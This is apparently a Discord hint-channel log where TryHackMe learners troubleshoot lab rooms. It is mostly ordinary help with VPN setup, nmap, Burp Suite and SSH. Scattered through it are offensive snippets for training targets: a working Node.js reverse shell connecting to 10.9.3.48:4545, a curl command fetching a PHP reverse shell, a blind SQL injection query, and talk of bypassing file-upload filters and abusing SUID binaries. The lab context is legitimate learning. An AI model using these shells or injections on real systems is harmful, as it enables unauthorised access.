#room-hints
1 messages · Page 101 of 1
For Net Sec Challenge, task 2, evading the "IDS" the room does not seem to be working. I've reset the box and room three times now and the IDS is apparently receiving traffic even though I'm not scanning it.
I've worked through all the types of scans, like X, M, W ... and the like. I've implemented decoys, spoofs, and fragmentation, as well as the -T levels.
You are over thinking it. Don't worry about it going up, just reset it when it does. The flag will pop when you get the right scan.
And have gone between the "Attack Box" and through my box over the VPN
Do I need to mess with any -T options?
Or is this just as simple as -s?
No, its just the nmap <scan type> <IP>
Ok so a very vanilla SYN scan gets me hit at 97%
Whereas the lowest I could possibly get it with decoys, spoofs, fragmentation, etc was 7%
See if this helps you any.
Lol thats one of the rooms almost right before the challenge
I know, I've pointed you to it for a reason.
Still getting detected. I've got it set to only port 8080. Should it be all ports or just the default range?
Ah got it. Wow
hey whats up guys? I just started my first ctf ( i am loving it), this can be a place where I reach out (assuming I have done my own research first) to help get unstuck?
yeah this is for hints for tryhackme rooms and tryhackme ctfs
only hints and not spoilers
spoilers are in #room-help
sweeeeetttt
hey guys, here is where I am at currently
im not sure if I need to put an ip address in here... I have a low level shell on the target machine
That's not a THM IP that you are trying to use with wget
so that is on the low level shell I have on the target ip
target machine that is, forget the ip
I wouldnt think I would put the target ip address in there as well?
Well you are trying to wget the file, so therefore your own machine has to be connected to the THM VPN and then you use that IP to get the file.
So is your machine connected via openvpn already?
correct
Then you also have to use that IP. Enter ifconfig on your machines terminal and use the IP on the tun0 interface
yes
tun0 is the vpn network card so yes
awesome... yeah my noob self did my own ip
any common reason why a secure shell is freezing? sure could be 100 reasons but wondering why it keeps happening right now
restarting virtualbox, lets see if that changes
here is my tun0 from vpn
this is on my kali
taking a very long time to connect. i feel like something is wrong
and he is my openvpn connection confirmation ( i believe)
restarting target machine and trying again.
same thing
any ideas? thanks in advance
got it!!! I secured my shell through ssh, so I need to use ssh, dummy!
anyone can help me out?
i found two webpages one with rocket chat and another with apparently no flaws
and the site says that i must exploit kubernetes misconfiguration
but i dont know how
it says that frank left exposed something that starts with "." and has 16 characters
i really dont have any idea what it could be
have you tried looking through the #905228711698247700 channel?
yes
Hello guys can someone help me on task5 Linux PrivEsc Jr pen path I found the kernel exploit
I download it on my kali machine created an http server with python did wget to transfer it to the target machine and they send me this
HTTP request sent, awaiting response... 200 OK
Length: 5119 (5.0K) [text/plain]
37292.c: Permission denied
Then you don't have write permission in the folder you are in. Search a folder where you have write permission and try to wget again
Ok thanks
Hey everyone... Not asking for the flag...But, Under Authentication Bypass...Logic Flaw room...where Robert is trying to reset his password... I'm having a brain fart....How do I get to Robert's email????
think they just give you it dont they?
I think I'm supposed to click a link in the email that takes me to where I can look at tickets... then I can get the flag
i'll look again
@karmic ice you discover the 3 usernames in task 2 - Simon, Steve, Robert
It's after that part...it's when you have to use three CURL commands
to reset Robert's password
I'm going to go look again. Thank you
yeh so following on from your initial question - they give you Robert's email...
you control where the reset email gets sent, so it wont get sent to his email account
Oh....ok I'll try that...THANK YOU
I totally missed the first step... Thank you for your help! I appreciate it
That's all it took...your help is greatly appreciated
@vagrant dove Giant THANK YOU for your input and help...
Gave +1 Rep to @vagrant dove
Thank you Robocop...I wanted to find some way to give them credit
hahah no worries my friend
ok im at the end of my rope
im doing DNS in detail and im stuck on question 1 for the practical
What is the CNAME of shop.website.thm?
oh i was gonna post a screen shot but it wont let me
anyway it keeps coming up "server can't find shop.website.thm.website.thm" so i really need to know, am i doing something wrong?
shop.website.thm. you duplicated the domain/tld
ya i tried that already
if you look, it already adds <domain>.<tld>. so only enter the subdomain
any luck?
nope. i really feel like im doing something wrong
update the record type, CNAME, then fill in "shop". click send request. very last line
lowkey wanna cry because i been on this same question for three hours and that works
i think i recall having an issue with it as well. like the record type changed and reset the value field.... i'm pretty sure i got mad at it as well
now im just stuck on the IP address for the A record
hint: "a record" and dont forget the subdomain
oh so thats just a randomly capitalized a?
an A record is a type of entry. A = ipv4 Address record. AAAA = ipv6 Address record
it's explained in task 3
ok so the issue i was having with the fourth question was the same you pointed out to me in the first.
many thanks for the help
hi, i am struggling with the ctf "vulnnet:internal" there's an rsync daemon and i think i can sync a dir from the remote server to my local machine. but i don't understand what the syntax for it is.
someone knows how to rsync from a remote server ?
hello guys I need a hint on task 7 Privilege Escalation: SUID I didn't understand the last part from We will "then add this password with a username to the /etc/passwd file." /etc/passwd is supposed to be rx only
which room?
Linux priv in jr pen path
Ah, okay. so you need to follow the task. look for a tool that has SUID/SGID set, and look it up in gtfobins. it will help you get access to write to /etc/passwd
Ok thank you I'll try that
Gave +1 Rep to @glass eagle
there are a lot of results, and as a beginner you dont know whats expected or unusual, but put the command names in gtfobins and you'll find a result
on the basicpentesting challenge
almost done and heres the hint asking about another username I know....
apart from a password, how else can a user access a machine?
I am unsure what that hint means besides, besides a password, what other ways can you get in....
unless they mean password hashes and the like
Public Key authentication for SSH - improve security, enable automatic log in without passwords.
i have the login through ssh
and cracked my first password
let me look though and thanks!!
yeah I have cracked the first password and I have also enumerated for possible esc privileges
for the other user that I have not cracked, I am unsure if I am supposed to do something different besides try to crack that one as well... maybe I am looking too much into it but there is another step I think Im missing. I will keep looking at the ssh if thats it!
any luck?
ah so the key is important here...
I will look where public keys are stored... I am heading to meet a friend but I will try when I get back
this is challenging and also exciting... thank you twypsy
hello, any hint on the Minotaur's Labyrinth room? i can't get the rev shell to work using netcat, i've got the user flag but cant get a rev shell
maybe ask in #906261933471187014
thanks
Linux Fundamentals Part 2 - Task 2, Accessing your linux machine using SSH (Deploy). I have the Attack box created, I connected through SSH to the private IP address, but it's not taking the password "tryhackme". Any thoughts?
thats the password?
It gives you the uname and pass and just tells you to login...
cli fires back tryhackme@10.10.15.68: Permission denied (publickey,password).
You might have to send a screenshot of that. Therefore you would have to verify your THM profile in discord first in order to be able to send screenshots.
!docs veriy
yeah i just did that not too long ago
OK - I believe I was verified... how can I tell?
You can tell by having the "verified" role on your THM discord profile in the THM server; it's in the discord docs, but you haven't read that far so far. Sry, the first link had a typo, so just use the latest one.
!docs verify
hope you get it verified mosquitoes, I just started as well, I love it
Well, I'm light blue.
here's the info for the AttackBox
And the instructions tell you that the password is "tryhackme".
Alright - no worries, it wasn't worth any points or anything. You just click next, but I felt like I was missing something. I've been going at this for a while, I'm taking a break.
You are trying to ssh into your own machine (attackbox) instead of into the target machine.
hi guys, i am doing the Network Services room, on the "Enumerating Telnet" task i am stuck when it asks me the "title" of the port i scanned, i don't have a clue about what it's asking me to do
i'm currently working on the active recon room, and am stuck task 5, the first question telling me to telnet the machine ip and port 80, then asks for the name of the running server but im having trouble doing such. i've typed telnet MACHINE_IP (the actual one) 80 but i get Connection closed by foreign host. whenever it finally gets done connecting. what am i doing wrong?
k well i watched a yt video and ran exactly what the guy in it did and it still didnt work so i just got the answers, but it seemed that netcat also didn't work so i did the same
Have you connected to the telnet port?
Yes i managed in the end, very confusing room though
Thank you! Got in this morning. Didn't realize I needed to run both of the machines
Gave +1 Rep to @left thunder
so confused on task 11 on https://tryhackme.com/room/zthweb2
i'm not entirely sure what the question is asking. based on the previous task, and the hint, i would assume i'm to fuzz the parameter.
i've tried all of the following but found nothing
http://10.10.88.53:82/FUZZ
http://10.10.88.53:82/FUZZ.php
http://10.10.88.53:82/api.php?FUZZ=id
basic pentesting and the last key dealing with keys
im probably off on the wrong path... I am trying to get the rsa key on the target machine for the first user I found, (not sure if thats the right way to do it as I think I want the key for the other user) I am also denied from viewing this stuff, so im not sure if thats why its saying there's no file because I cant access it.
i have set up a simplehttpserver on the target machine
Eyyy, can i ask about the JR Penetration tester > Introduction to web hacking > sql injection > Task 8 Blind SQLi - Time Based
sure they could help but theres a jr pentester chat?
oh i didnt see lmao, thanks
There's a channel for that #905228711698247700
any nudges for flag3 on python playground?
I found an internal web server running... How to get around it?
should I try dirbusting? (coz the whole box was about challenges and not anything bruteforcing, so haven't tried that yet)
Windows Fundamentals 1 - Intro to Windows... it's talking about using RDP, but I don't see anything in the AttackBox that indicates that it is the RDP... later on in Task 6, I think I'm supposed to be RDP'd into the target machine in order to extract usernames, what groups they're members of... I just refreshed the page and it switched from the AttackBox that I've been seeing and now it's a Windows PC "THM AttackBox:WINFUN1.1". Same name as before, but... not sure what's going on here. Still no RDP, just Remote Desktop Connection
very frustrated walking away for a few
nm - it didn't actually want me to RDP... just using the Winfun 1.1 box and go through lusrmgr... hmmm
Hi guys I'm doing Linux privilege escalation on kernel. I try to use SimpleHTTPServer and wget but I can't transfer the exploit code on the target machine to exploit it. I'm noticed that "permission denied". Please can somebody help me ?
You have to search for a directory where you have write permission to.
Done. Thank you very much
Gave +1 Rep to @left thunder
Writeups are not working
Can someone provide a nudge for the minotaur room please
Flag number 2
Just wanna know if I'm on the right way
There is a dedicated channel for that room if you are talking about the newly released one. #906261933471187014
Thank you
Gave +1 Rep to @left thunder
hello
hope u doing well
can anyone suggest any book/course about assembly language
thanks
Search for assembly on tryhack me. There are a few good rooms
am i the only person having problems getting access to the robots file on the pentesting course "Manual Discovery - Robots.txt"
i started the machine and then waited for the ip to show up and when i click on the link "this page can't be reached" pops up
Are you trying to access it from the attackbox or your own machine?
For books you might want to check/ask in the #bookclub channel
its the start machine button at the beginning of the task
Yes, that button is for the target machine. But from what machine are you trying to access the robots.txt that's on the target machine?
task one was telling me to start the machine before moving to task 2, which is where im asked to go to acme page to view robots.txt
but for some odd reason it wont load
Can you try if you can access 10.10.10.10 in the browser of the machine you are trying to access the robots.txt with?
So just enter that IP in your url bar
im trying it now but nothing is popping up
Then you are most probably not connected to the THM VPN and therefore can't access target machines. You have to set up openvpn first in order to be able to access any THM machine if you are doing it from your own machine. Or use the attackbox. This room will guide you on how to set that up: https://tryhackme.com/room/openvpn
Hei, everyone! Does anyone have any idea what I'm doing wrong that John doesn't seem to work? I've tried different syntaxes, tried apt purge, apt reinstall, john seems to be on the latest version, 1.9.0 and I honestly have no idea what is wrong here.
It seems it has already cracked it, what if you do john --show forjohn.txt ?
oh damn, I actually did not think about that, to be honest didn't know about that option lol
I feel stupid, but damn, learned something new out of it. Thank you so much!
ok so i downloaded the openvpn and connected, then when i went back and clicked on the link now the site is saying - User-agent: *
Allow: /
Disallow: /staff-portal
Alright, so now you successfully saw the robots.txt file
wait huh thats what i was suppose to see?
Yes
lol oh, im still over here mad stopping and and restarting the machine
Well ^^ ..
thank you, you helped a lot
Gave +1 Rep to @left thunder
@left thunder how does the bot work? Should I have replied with "thank you" to you? Cause you definitely helped me too, a lot, and I would like for you to get another rep
The bot will give rep if you either reply to an answer or tag him with something like "thanks, or thank you or +rep" , but it's fine, it's more of a fun gadget
Gave +1 Rep to @shy pagoda
thank you!
Gave +1 Rep to @left thunder
x2 even. Hah, might abuse it.
ok i'm back again side note: my letter 'n' doesn't work right now and i have to copy and paste it when i need it. that is a problem for some of the work in the VM, because i cant copy the "n" where i need it. so i'm having a problem with task 3 pentesting.." Manual Discovery - Favicon " where do i run the code? so i can get the answer. thank you
do i use the terminal in the attackbox? because i can't use the letter 'n' on my keyboard. i have to copy and paste.
i think i have to subscribe, don't i ?
You have to subscribe for what?
my letter 'n' doesn't work right now and i have to copy and paste it when i need it. that is a problem for some of the work in the VM, because i cant copy the "n" where i need it. so i'm having a problem with task 3 pentesting.." Manual Discovery - Favicon " where do i run the code? so i can get the answer. thank you
Gave +1 Rep to @left thunder
Well you are just copy pasting what you already wrote, I'm not quite sure what the letter "n" and you not being a subscriber has to do :D? As you said "i think i have to subscribe"
ok the question i really need to know is, do i have to subscribe to an paid membership to get the answer needed for most of the task. i'm having a problem with task 3 pentesting.." Manual Discovery - Favicon " where do i run the code? to find the answer.
No
You don't need to be subscribed to answer any question
If the room isn't a subscriber only room, then you don't need to be subscribed
Okay, I guess you are talking about the curl https://static-labs.tryhackme.cloud/sites/favicon/images/favicon.ico | md5sum part, right?
yes
because i spilt milk on my laptop i cant use the letter 'n' to type. in the vm machine world.
i'm waiting on a new keyboard
You can copy paste the command. You run it on your attacking machine
in the terminal?
So it depends on where you are trying to do it. The attackbox has no internet connection for non subscribers, so I highly assume you can not access the site https://static-labs.tryhackme.cloud/sites/favicon/images/favicon.ico on it. I personally haven't tried it for that url, but I guess you can't reach it. So you might have to set up your own VM in order to do that task.
i tried copying and pasting, didnt work
Are you using the attack box or your own vm?
attackbox
ok so i have to sign up.
No
To copy paste to the attack box you have to use the copy paste tool. I'm not entirely sure how to explain it tho
Actually, you might not be able to reach that link from in the attack box
Since attack box has no internet
I mean all you have to basically do is getting the md5sum of the favicon, maybe there are some online tools where you can just upload the favicon to, to get the md5sum. Or you can do it on your own machine, not sure what operating system you are running or what tools you need for your operating system to get that md5 for the favicon. But ye, either you subscribe to get internet access on your attackbox, or you just install your own kali linux (for example) on a virtual machine on your computer, so you can do all the free rooms in kind of the same way as you would be on the browser based attackbox.
I would go with installing kali in a vm
in this video I am going to show you How to install Kali Linux in Virtualbox : Step-by-step . This is A detailed guide on installing Kali Linux on VirtualBox. I am going to show How to Install Kali Linux 2020.1b + Guest Additions on VirtualBox.
Installing VirtualBox Guest Additions in Kali
apt-get update && apt-get install -y linux-headers ...
Follow that guide to set it up
thank you, im about to do so now.
Gave +1 Rep to @left thunder
thank you, im about to do so now.
Hey guy's. Linux fundamentals part2. can't understand why I can read file from another user
hey guys im doing the brute force section in bypass authentication, in the jr pentester path. Im trying to use this ffuf command but it doesnt give me any output despite doing everything as I was told
Check the permissions, read permission for "others" is set.
Check your valid_usernames file, there should be only 1 username per line without any status codes or whatsoever
thanks,i will try that
it worked
how can i give you +rep?
Thanks!
Gave +1 Rep to @left thunder
Thanks!
Gave +1 Rep to @left thunder
hope this can be helped here, please let me know if theres a better room for this... I am looking at burpsuite room and I am unsure of this instruction
when it says navigate to the web application hosted on the VM (ip address listed at top of screenshot, I am not really sure what I am trying to connect to. I typed in the ip address of the vm, but thats just loading... not sure
heres my burp pulled up as well
the browser is loading because its waiting on a response. burpsuite is acting as a proxy to make the requests. burpsuite would need to allow/deny the request before the browser gets their response
for this, click on the "action" next to "intercept is on" and look at the options
you'll get other requests from the computer. firefox updates, checkins... it happens
are we sure that the stuff showing in burpsuite the googleapi is from the ip address that I put in?
its from your browser. any tab/plugin/etc that browser has open/enabled.
Return to your web browser and navigate to the web application hosted on the VM we deployed just a bit ago. Note that the page appears to be continuously loading. Change back to Burp Suite, we now have a request that's waiting in our intercept tab. Take a look at the actions, which shortcut allows us to forward the request to Repeater?
but whats the web application? sorry im not getting this
a website is a web-application.
so when it says on the vm?
that means put the ip address of the target machine into the url window?
- yes. take your attack machine (running burp with the burpproxy enabled) and load the website hosted on the target VM
- the requests will show up onproxy > intercept
the answer is visible here
trying again now
thank you... will let you know if any issues come
i legit didnt realize when they say shortcut
they mean ctr+s whatever
prob should take a break for the day
Question: In vulnversity, is there any practical use to the user flag in /home/bill or is it just "there"?
Well it's used as the answer for a question in the task, so yes there is a use for it ^^?
Think of the flags as placeholders for files or pictures or passwords. They represent sensitive information that you weren't intended to have access to
can anyone give any hints on where to start in the picklerick ctf? ive only found the username and used gobuster
You can use gobuster to search for file extensions, as well as directories
Hello folks, I need a help...I am stuck in one of the https://tryhackme.com/room/xss TASK-3, Qstn-3
Where I have to Create an alert popup box appear on the page with document cookies.
I have done that part after logging into attack box and even got an alert pop-up with the answer... But that answer is not getting accepted... Not sure.. if I am missing anything there..
Need a nudge for Bounty Hacker priv esc if someone doesn't mind
Try restarting the machine and then trying the injection again
Could you give a link to the room please?
Ah I've done that one before and did a write-up I think. Give me a sec because I haven't gotten up yet XD
Yeah user wasnt bad to get but ive been stuck for a bit now.
What have you tried so far?
I've looked through SUID's, and was thinking if i could set up something with netcat but not sure where to start or if that would escalate it at all
Did you find any SUIDs?
so, user isnt in sudoers and the only ones I saw on gtfobins needed it
The first thing I tend to do for priv esc is check which commands I can execute as sudo
sudo -l
I do this first since it's the quickest thing. Then I check SUIDs and then crontab etc and so on lol
You're welcome :)
Got it. I was stuck for like 3 hours and you saved me
you're very welcome ^^
Hey, everyone! Hope you are all having a good day/evening/night! I am currently working on "Agent Sudo", and I'm trying to get my hands on a file through ssh, using scp, but I am not sure what I am doing wrong? Could you please point me in the right direction maybe? Thanks in advance!
Thanks... It was the difference of 0 and O
Gave +1 Rep to @dry gate
what the hell, this is just another time that I am so amazed seeing how I'm not paying attention to small details and thus causing trouble lol
Thank you!
Gave +1 Rep to @burnt rivet
I'm now at the part of privilege escalation on Agent Sudo, I have tried to run linpeas, but I am not sure what I should be looking for...any hints (just hints, please)?
think about the name of the room
thank you! Was thinking about it before, but you reinforced the thought that this might be it for me!
Gave +1 Rep to @polar finch
anybody help with a burpsuite
its on the burpsuite intruder room
I ran the pitchfork and it came back with 100 guesses, the only problem is all of mine are the exact same length, whereas the answer says you will have one that is different
heres payload set 1 which is the username.txt
payload 2 with passwords
positions
results
I think you haven't intercepted the request when pressing the submit button after entering a username and a password, rather you have intercepted just the simple request of the login page itself
so i never actually entered the username and password... i only changed it in the intercepter
Right, so go to the login page, enter any bogus username and password and only then turn on intercept, then press submit so that you intercept the actual login request.
or I could just turn everything off and then turn it on
You can do that too
one sec
Hi guys, I cannot submit answer on room/fileinc task 5 - first question. I have a string which worked and matches the ***... hint but there is no right/wrong popup when I hit submit
so once I clicked submit (i entered user and pass) I can forward this to intruder, and then do the same steps I did previously
trying now
Right, as that is the actual login request, the previous request you edited was just the request to go to the login page itself
Try ctrl + F5 to hard refresh the page
let me in
so basically, just make sure the request is the correct request/etc
otherwise, you wont have the correct info
Well I mean you could have crafted the request yourself, but I think that's out of scope and anyways it's way easier to just intercept the correct request, so yes π
help with vulnversity (im actually using burp suite now) and I am under compromise the webserver
please
ill post what I have
the document I am trying to upload
screen of me choosing the document I just showed to submit
all the same output
I have obviously made a mistake as the output is all the same, which is not good for me... I tried following the steps listed, but I might have made a mistake in the document itself i submitted through the form or my payload option isnt right by me putting in the .php, etc... would be very much appreciated
I think the issue is that you didn't give your shell file an extension itself (you called it just "shell" instead of shell.php for example), therefore the content-type was specified as octet-stream as you picked that "shell" file to capture the initial request and now causes that issue.
yeah i did that (incorrectly) as I modified actually shell.php TO the shell haha.
let me see
do i need to dress up the php doc itself as well?
Not sure what you mean with dress up ?
like is this code fine? I meant like do i need to do <php>
</php> in the doc itself
i might be talking nonsense (I most def am)
Well that file would be used as a wordlist, regarding to what you put in there. So not sure how you specified the wordlist in the previous image. But the important thing is that you have to upload a file with .php extension for the initial request.
ok let me try again... ill have a question about my payload in just one sec. thats what got me here in the first place
Either you write the file extensions you want to use for your sniper attack manually in the payload field, or specify a wordlist file, it's up to you
I think i might have done both... let me run this real quick.
here is what i just set up. I am about to run the attack
Ye content type looks fine now
Looks also fine
Oh you have an issue with the payload position from that image. Clear the payload positions and add it again at the correct position. If you look closely it says "3 Payload positions". But it should be just 1 Payload position to snipe the file extension.
Look at the left bottom corner, it says 3 Payload positions, can you see that? Not visible in that image as you cut it off, but I saw it in the previous image
ahhhh
one sec
i have no idea how that happened... maybe previous stuff I was messing around with
Ye, just clear them with the buttons on the right and set it again on the right position and you should be good
Ye, that's fine now. At least I hope so

heres what I have for the payload options (i simply loaded the shell.php in there)
Man, that task shouldn't have been that difficult. Can you send a screenshot while you have the .php5 marked in your results so I can see the raw request field?
this>?
Yes
Mh, I wonder if the issue is that the . got url encoded, let me try myself, 1 moment
Okay, seems it is because of the url encoding. At the payloads tab, at the bottom of that page, there is a checkbox for url encoding special characters, uncheck that
so that was a default setting, is this something that normally isnt a big deal, but is here?
Not sure, I would say usually you will use intruder on the request body instead of the headers, so maybe that's why.
phtml baby
Finally. That one gave me a hard time right now for such an easy task ^^
goodness but i got through it
so im not sure if i understood your last message... is there a lesson here i should learn about the url encode? not sure i fully grasp that yet
Stole that pic from @burnt rivet ^^ But that's just a great pic to show what the headers are and what the request body for example.
But regarding url encoding I would just look it up on google
yup just screenshot that
is there a better tool to do an intruder attack than burp? I have heard a decent number of people who dont use it
but just a beginner
Well intruder is just the name of that burp module, so it depends on what you want to do, if you try to bruteforce something with kind of large wordlists then burp might not be the right choice. But for stuff like where you kind of manually try to modify requests, so regarding that example, figure out what extensions are allowed, I think intruder is great.
me again
this has got to be something small
where im at
ncat listening
this is the php-reverse-shell.phtml
that is my ip and it is connected to tryhackme
also port 4444 and i also have ncat at 4444
php-reverse-shell.phtml going into upload
upload success
what i put in the url bar
fails
and its not showing on my netcat
only other thing i found was I went to the uploads and clicked on it, but it still isnt working. Thanks in advance
i did restart and did the same steps
script
showing i am getting the 5th version of this ive created
I tried clicking on the 5th
and this again
and nothing on nc
Can you send the link to the room?
and I am under task 4 towards the end
Gimme a sec the run through the room. Should only take a few minutes
joker, I have been working on this for hours, I am going to head off but look first thing in the morning... if youre able to get it working, any screenshots would help me... not sure whats going on with mine.
and thank you for taking the time... been banging my head and im sure its something small
I was just about to ask if you're sure you're using the right ip address
If you're still on, if you could do an ifconfig tun0 and send a screenshot
Best I can say is try terminating then restarting the box for now. Not exactly sure what causes the failed to daemonize error but I'm looking into it
yeah i had two tun0 and tun1 previously
i quit all
restarted my vm
and then confirmed i only had one tun0 as you just saw
im restarting the box, and ill give it one more try before bed ha
Try redownloading the reverse shell
good tip
To make sure you arent cutting part of it out accidently, do curl https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -o test.phtml to download it
then make sure you only change the IP address and port
alright just changed the ip to my target machine and kept the port as is
my nc is also 1234
see the weird thing is I will try the /uploads page and half the time, it won't really connect, the other half it will
it's kind of a dance I'm doing with it
ok i just uploaded the test.phtml
now I'm going to uploads to click on the link
moment of truth
anddddd it's just loading....
here was the test document
I've heard that it could be a firewall issue, but idk.
If you want to, you can try turning off your firewall on your host machine and see if it works
You could also just try using port 443 cuz that usually slips past firewalls
Do you have an anti virus on?
could i just try to go to uploads and click on the same link?
not yet but im trying to make sure its off
turned it off and still the same effect
is there anything on my kali that could be holding it up?
Probably. But idk
yeah this has been frustrating... I'm going to call it a night.. hope I can message tomorrow! thanks for sticking in there with me man
I completely closed it, terminated the machines and ran it again on different browser. No change
any hints on how to get foothold on squidgames machine?
What you mean with ran it again? I thought the issue was with entering the answer?
There is a dedicated channel for that room, maybe you ask there. #908436580438540388
hey everyone, I'm stuck at Year of the Fox, I have managed to get the creds for the web, now I'm stuck on how I can make the search bar useful as it returns a list and I have no idea what to do from there
I can only change the parameter from the {:} dict when I used Burp
can i get a hint please
does anyone know why concat would return one entry, while group concat is returning multiple (screenshots coming)
Why does this union work when referencing a different table 'users' than where the current selection statement is pulling from? Every other command prior to this we had to specify the specific databasename and table name in order for this to work
Not sure if you should post flags in here. But regarding your question, for the previous statements you had to specify the database name as you were querying from the information_schema database, and in order to retrieve the tables and columns for that task you had to specify from which database you want to get the table and column names. If that's what your question is about.
ah my apologies, will delete and repost
so your assumption is that the users table exists within the same database that this unmodified select statement is pulling from, right?
Ye, you are basically already inside the database for that task, so you don't have to specify it, you only have to specify from which tables you want to query from.
one more question if you dont mind
Figuring out the database name itself was only to find out the correct table and column names
with the original select statement, lets assume its this
select * from blogposts
when we enumerate the columns we do something like union select null,null etc
lets assume blogposts has 3 columns
when we start to then pull data from another table, users, does the users table need to have the same amount of columns for this to work?
I think yes, so if one table has 4 columns and the other one has 3 but you query 4 columns, I think that's not working. But not a 100% sure so you might look that up. But task 3 has a brief description of the UNION statement, so you might reread that.
it worked when i went to the attack box... scratching my head why it didnt work on kali
Hi there, are the KotH points also contributing to the monthly scores?
Network Services - Exploiting SMB. I've logged in with the anonymous account and null password. I can ls the contents, but I can't figure out how to tell who the profile folder belongs to...
Here's a list of commands that I have access to
Then you might want to check the files you found.
Yes, I'm trying.
However, cat.. nano, don't work
I tried allinfo "Working From Home Information.txt" but that doesn't give much
OH, wasn't doing quotes on "More"
Got it I think
So... is "scopy" the same thing as "scp"? I'm not seeing anything on the web about scopy, but I can find "scp" referenced.
I'm trying to get the syntax correct for scopy to get a local copy of the id_rsa file so I can chmod 600 on it
If you're in an SMB share try get
yeah, get will move a file onto your machine. mget will move multiple files. From there you can cat them.
I am trying to do the /bin/bash by adding the +s to bash
and I'm trying to figure out if I actually know the password for this user www-data
I guess I'm asking if I am on the right path or not
but I don't think it's even allowing me to do that
this is on vulnversity, last step before I take a small break from breaking boxes and just learn for a bit
but the hint is /bin/systemctl
and I executed it but I'm not sure about that unless there's something in systemctl that can change something
will do
Can anyone give me a hint on the new SQL injection room on the junior pentesters path? I'm on task 8. I've figured out the database name and i'm working on the table name. It's already 19 characters long. Have I somehow gone down the wrong path?
Ye, 19 characters seems too long
That's what I'm thinking, but it's two distinct words separated by an underscore. So it's definitely something there in the database.
The room is new enough that there's no write-ups, which I may make one over the holiday break. I've been looking for a need like that. Gotta figure out the room first though.
You can post the query you are trying right now and I can let you know in case there is something wrong with it
Fair enough. Just don't want to leak any answers
You can mark it as spoiler with the 2 vertical bars
|| ==admin123' UNION SELECT 1,2,3 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA
='sqli_four' and TABLE_NAME='analytics_referrers' and COLUMN_NAME like 'a%';
Hmm... didn't work
At the beginning and at the end you have to put them
Learn something new everyday.
I believe there's more to the table name because the column name isn't making any delays on any characters.
Ok well, ye that table is there too, so I would just go over the tables again to look for another one
Yea. Somebody should probably be aware of that. If I started with 'a' and enumerated from there others probably will too. I don't know how to alert about that.
anybody here to help with my last step in vulnversity
i am just having an issue opening a http.server as I want to share a file
when I try python -m http.server 80, it lets me know that it's already in use... but I never started anything on my end on port 80... any thoughts on how to get around this
I made my service script on my machine and I am trying to get that over to the target machine
ok that worked
now I can use wget on the target machine, at least thats what Im going to try
ha
opened the port
but then i tried wget with my vm ip and then the name of the file,which I will show on my host machine
showing root.service on my vm machine
what am I missing?
I dont think it matters, but I will show what the root.service is
again on vulnversity. trying to privescl
add the port after the ip
on the wget request?
wget 10.10.161.19:8081/root.service
gotcha. let me try
target machine
says success but says permission denied
heres my machine
that doesn't have anything to do with the permissions I gave to root.service... I don't think that's relevant here
?
i just did this.
lets see if that changes anything
I don't think I gave it the proper w command as it says it can't write to the service
won't be allowed in the machine I guess
?
You have to be in a folder where you have write access in when you wget that file.
hello guys
any hint on containme room?
seems that i should start a ssh bruteforce
Hello, wondering if anyone can help me with the Attacktive Directory lab, I'm right at the end using evil-winrm v3.3 but running the command keeps timing out. I have the hash and have tried using username a** and spoka, both have timeouts. I tried using the xfreerdp method but it connects and says the account is restricted using no password
I tried to add the a* account to the remote users group but both user accounts I have access to can't access users and groups
never mind, I used the Attack Box to complete this and it's using v2.4, the same command worked
#908828816393244742
And don't bother.. No need for bruteforcing anything
i dont understand
i am solving the upload vulns room
i have done everything correctly, even i watched videos on youtube
still the reverse shell isn't working
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(4545, "10.9.3.48", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application from crashing
})();
i have also set the magic numbers properly
you're going to have to be more specific. Which task?
I can't help atm but it's so that if someone does see this, they'll be able to help out :P
The error says that: The image "PATHTOIMAGE" cannot be displayed because it contains error
so the folder itself i would do chmod or the file?
You have to search a folder where you are able to write to, so where you can create files, otherwise wget can't write the file you are trying to download into that directory
and that's on the target machine, not my machine, correct? thanks for all your help fontaene
Gave +1 Rep to @left thunder
I mean you want to transfer something to the target machine and therefore use wget on the target machine, right? So yes
Thank you for your help yesterday (and same with @left thunder )
Gave +1 Rep to @waxen mica
Ok - probably another silly question. Network Services - Task 4 - Exploiting SMB. I'm at the very end of the section and it says to change the permissions to the downloaded "id_rsa" with chmod. I confirmed the changes through ls -l, it's accessible and it's the key that's needed. I've found the account name was "cactus". However, in both smbclient and ssh I'm not seeing any options to use a key instead of entering the password.
Maybe -A authfile?
ssh -i keyfile user@IP
room: https://tryhackme.com/room/ide
i thought i was going crazy because i've been trying this for about 30 minutes and thought i was using the wrong file, but i checked writeups and it is the right one
why is this not running my command?
THANK YOU!!! I feel like I've been beating my head against this thing. Thanks again!
Gave +1 Rep to @left thunder
does anybody ever have any issues when downloading a new OS on VirtualBox, when I load, the screen keeps flickering
im trying to look into resolution, etc
this is more of a question for #infosec-general :)
cool
So, the question for Network Services: "Based on the title returned to us, what do we think this port could be used for?"
I've run the standard nmap enumerations that I have gone through, but they all basically say the same thing. I'm not seeing a title
LOL I WAS LEGIT GONNA SEND THIS RIGHT NOW
like I just now went here and was about to ask the exact same thing
well now you know that the open port is 8012
there are a couple of ways of doing this
wait no scratch that XD
I can only think of one. I'm not at my vm atm lol
nmap -sV -p 8012 10.10.154.248
That's a version scan
I believe that will give more information
I tend to use -sC -sV. -A is also a good option
these can be slow so doing -T4 is a good choice (second fastest time template)
let me know if there's something that doesn't make sense and I'll try my best to explain :)
(Running scan now) - but yeah, that makes sense once you saaay it.. lol
this stuff can be a bit overwhelming at first but it's some awesome flags to add to your nmap arsenal ;)
Thank you! - I'm still a little confused by the results, but it was enough to get through the last questions for the task!
Gave +1 Rep to @dry gate
you can always ask! ;)
glad you got through the task :D
what title is it supposed to return?
if you look at the "* ********" and that's part of the hint. it says it over and over inside the output
|| PORT STATE SERVICE REASON VERSION
8012/tcp open unknown syn-ack ttl 64
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8012-TCP:V=7.60%I=7%D=11/13%Time=61903B07%P=x86_64-pc-linux-gnu%r(N
SF:ULL,2E,"SKIDY'S\x20BACKDOOR.\x20Type\x20.HELP\x20to\x20view\x20comman
SF:ds\n")%r(GenericLines,2E,"SKIDY'S\x20BACKDOOR.\x20Type\x20.HELP\x20to
